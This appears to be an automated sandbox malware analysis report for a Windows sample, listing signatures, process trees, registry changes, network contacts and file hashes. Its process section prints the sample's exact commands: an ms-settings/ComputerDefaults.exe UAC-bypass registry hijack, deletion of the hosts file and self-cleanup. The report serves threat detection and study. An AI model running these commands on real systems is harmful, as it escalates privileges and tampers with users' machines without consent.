Malware Analysis Report

2024-12-07 16:50

Sample ID 241113-efyx2swdrp
Target theone.txt
SHA256 8101b388cc8a6a9c948f8d71de9938702b5c25978d804769c8c20fe258adc959
Tags
defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

8101b388cc8a6a9c948f8d71de9938702b5c25978d804769c8c20fe258adc959

Threat Level: Shows suspicious behavior

The file theone.txt was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion

Checks computer location settings

Indicator Removal: File Deletion

Legitimate hosting services abused for malware hosting/C2

Unsigned PE

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 03:53

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 03:53

Reported

2024-11-13 03:53

Platform

win10ltsc2021-20241023-en

Max time kernel

11s

Max time network

12s

Command Line

"C:\Users\Admin\AppData\Local\Temp\theone.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\366403.vbs" C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4152190078-1497776152-96910572-1000_Classes\ms-settings\Shell\Open\command C:\Windows\system32\reg.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1060 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1060 wrote to memory of 3392 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 3392 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3392 wrote to memory of 2228 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1060 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1060 wrote to memory of 2512 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2512 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2512 wrote to memory of 4220 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2512 wrote to memory of 4064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2512 wrote to memory of 4064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1060 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1060 wrote to memory of 1808 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1808 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 1808 wrote to memory of 2424 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ComputerDefaults.exe
PID 2424 wrote to memory of 4208 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wscript.exe
PID 2424 wrote to memory of 4208 N/A C:\Windows\system32\ComputerDefaults.exe C:\Windows\system32\wscript.exe
PID 4208 wrote to memory of 1208 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 4208 wrote to memory of 1208 N/A C:\Windows\system32\wscript.exe C:\Windows\System32\cmd.exe
PID 1060 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1060 wrote to memory of 3096 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1060 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 1060 wrote to memory of 2832 N/A C:\Users\Admin\AppData\Local\Temp\theone.exe C:\Windows\system32\cmd.exe
PID 2832 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2832 wrote to memory of 2964 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\theone.exe

"C:\Users\Admin\AppData\Local\Temp\theone.exe"

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\cmd.exe

/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\366403.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\366403.vbs" /f

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f

C:\Windows\system32\cmd.exe

/c start /B ComputerDefaults.exe

C:\Windows\system32\ComputerDefaults.exe

ComputerDefaults.exe

C:\Windows\system32\wscript.exe

"wscript.exe" C:\Users\Admin\AppData\Local\Temp\366403.vbs

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts

C:\Windows\system32\cmd.exe

/c del /f C:\Users\Admin\AppData\Local\Temp\366403.vbs

C:\Windows\system32\cmd.exe

/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\reg.exe

reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 zetolacs-cloud.top udp
US 172.67.206.185:443 zetolacs-cloud.top tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 185.206.67.172.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 checkappexec.microsoft.com udp
GB 172.165.69.228:443 checkappexec.microsoft.com tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp

Files

memory/1060-0-0x000001BB57070000-0x000001BB57071000-memory.dmp

memory/1060-1-0x000001BB57080000-0x000001BB57081000-memory.dmp

memory/1060-2-0x000001BB589D0000-0x000001BB589D1000-memory.dmp

memory/1060-4-0x000001BB589F0000-0x000001BB589F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\366403.vbs

MD5 8b4ed5c47fdddbeba260ef11cfca88c6
SHA1 868f11f8ed78ebe871f9da182d053f349834b017
SHA256 170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA512 87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf